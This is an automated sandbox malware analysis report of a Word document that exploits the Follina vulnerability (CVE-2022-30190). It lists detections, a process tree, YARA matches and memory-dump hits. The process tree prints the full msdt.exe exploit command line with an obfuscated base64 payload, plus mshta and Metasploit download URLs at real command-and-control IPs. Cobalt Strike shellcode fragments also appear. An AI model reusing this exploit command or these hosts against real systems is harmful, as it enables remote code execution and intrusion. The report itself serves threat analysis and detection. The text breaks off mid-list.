Edit tour

Windows Analysis Report
V3g2Pfu707.docx

Overview

General Information

Sample Name:	V3g2Pfu707.docx
Analysis ID:	647003
MD5:	b60cd79e2c14dbeefa22197f76fc3437
SHA1:	07a2811a3ea7a4a0c84e52cb5a48f1e712b55fd9
SHA256:	6ddab79a6d836f9c1ed9ab3bbe28a074c0c93bd87f55144ed62b23c0032715d1
Tags:	CVE-2022-30190docfollina
Infos:

Detection

Metasploit, Follina CVE-2022-30190

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Metasploit Payload

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Uses known network protocols on non-standard ports

Detected suspicious Microsoft Office reference URL

Contains an external reference to another file

C2 URLs / IPs found in malware configuration

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Internet Provider seen in connection with other malware

Found dropped PE file which has not been started or loaded

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Compiles C# or VB.Net code

Potential document exploit detected (performs HTTP gets)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 6308 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

MSOSYNC.EXE (PID: 6532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)

msdt.exe (PID: 7052 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)

csc.exe (PID: 4208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 6980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)

csc.exe (PID: 6940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 3400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)

mshta.exe (PID: 5852 cmdline: "C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta MD5: 7083239CE743FDB68DFC933B7308E80A)

csc.exe (PID: 5532 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 6988 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)

EXCEL.EXE (PID: 400 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

rundll32.exe (PID: 2396 cmdline: C:\Windows\\SysWOW64\\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Metasploit

{"Headers": "Accept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: https://www.microsoft.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_07_00) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\r\n", "Type": "Metasploit Download", "URL": "http://106.55.17.200/jquery-3.3.1.slim.min.js"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	SUSP_Doc_WordXMLRels_May22	Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard, Wojciech Cieslak	0x39:$a1: <Relationships 0x552:$a2: TargetMode="External" 0x54a:$x1: .html!
document.xml.rels	INDICATOR_OLE_RemoteTemplate	Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents	ditekSHen	0x507:$olerel: relationships/oleObject 0x520:$target1: Target="http 0x552:$mode: TargetMode="External

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0xc:$tagasp_long20: <script language="vb 0xd1:$asp_payload11: Wscript.Shell 0x78:$asp_multi_payload_one1: CreateObject 0xc3:$asp_multi_payload_one1: CreateObject 0x78:$asp_multi_payload_four1: CreateObject 0xc3:$asp_multi_payload_four1: CreateObject 0x78:$asp_cr_write1: CreateObject( 0xc3:$asp_cr_write1: CreateObject( 0x324:$oo1: O"&"C 0x32f:$oo1: F"&"O 0x34d:$oo1: o"&"c 0x372:$oo1: r"&"e 0x37d:$oo1: L"&"o 0x396:$oo1: r"&"o 0x3be:$oo1: h"&"r 0x3c9:$oo1: A"&"s 0x40e:$oo1: A"&"R 0x42c:$oo1: A"&"s 0x448:$oo1: e"&"s 0x453:$oo1: A"&"s 0x471:$oo1: e"&"s
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000019.00000003.506676110.000000000626D000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499865318.0000000006E54000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xf0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.498703501.000000000583F000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x90e:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500021102.0000000006E34000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2b78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500164196.0000000006E17000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2800:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509313999.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x500:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499436698.0000000006E9B000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x13b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4878:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7d50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb238:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe720:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11c08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15100:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500090549.0000000006E2A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2f70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500504965.0000000006DD2000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499684731.0000000006E71000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x7b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509423270.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x500:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500246766.0000000006E08000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1578:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568757163.0000000006E43000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xbf8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.505927561.000000000636D000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xe88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5958:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7ec0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa428:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc990:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xef08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11480:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x139f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15f70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x184f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1aa80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d008:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f590:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21b28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x240c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500477251.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x11a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508961693.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500075794.0000000006E2E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2368:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499611659.0000000006E81000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xe20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500491953.0000000006DD5000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xe68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499493418.0000000006E94000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1a20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508307572.0000000005E40000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x168:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500524387.0000000006DCF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x818:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500409413.0000000006DE2000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x1cec:$a: PCWDiagnostic 0x3823:$a: PCWDiagnostic 0x553e:$a: PCWDiagnostic 0x1c84:$sa1: msdt.exe 0x1cc0:$sa1: msdt.exe 0x20da:$sa1: msdt.exe 0x380d:$sa1: msdt.exe 0x1d92:$sb3: IT_BrowseForFile= 0x3876:$sb3: IT_BrowseForFile=
00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
00000019.00000003.503297847.00000000066F5000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3320:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5d68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x87b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb1f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdc40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10688:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x130e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15b38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18590:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1afe8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1da50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x204b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22f20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25988:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x283f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ae68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d8e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30358:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x32dd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x35858:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500310887.0000000006DF5000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1008:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.505719347.0000000006392000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1658:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3bf0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6188:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8720:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xacc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd270:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf818:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11dc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14378:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16930:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18ee8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b4a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1da58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20020:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x225e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24bb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27178:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29740:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2bd18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2e2f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x308c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500548113.0000000006DC9000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x28b2:$a: PCWDiagnostic 0x2888:$sa1: msdt.exe 0x2956:$sb3: IT_BrowseForFile=
00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
00000019.00000003.500261822.0000000006E04000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x21e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500418706.0000000006DDF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x830:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568673308.0000000006E23000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x398:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507852725.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x17e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3700:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5618:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7530:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9448:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb360:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd288:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf1b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x110d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13000:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14f28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16e50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18d88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1acc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cbf8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1eb30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20a68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x229a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x248e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26830:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28778:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568682358.0000000006E26000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x780:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508838061.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2408:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3f20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5a38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7550:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9078:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xaba0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc6c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe1f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfd18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11840:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13378:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14eb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x169e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18520:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a058:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1bb90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d6d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f220:$s17: 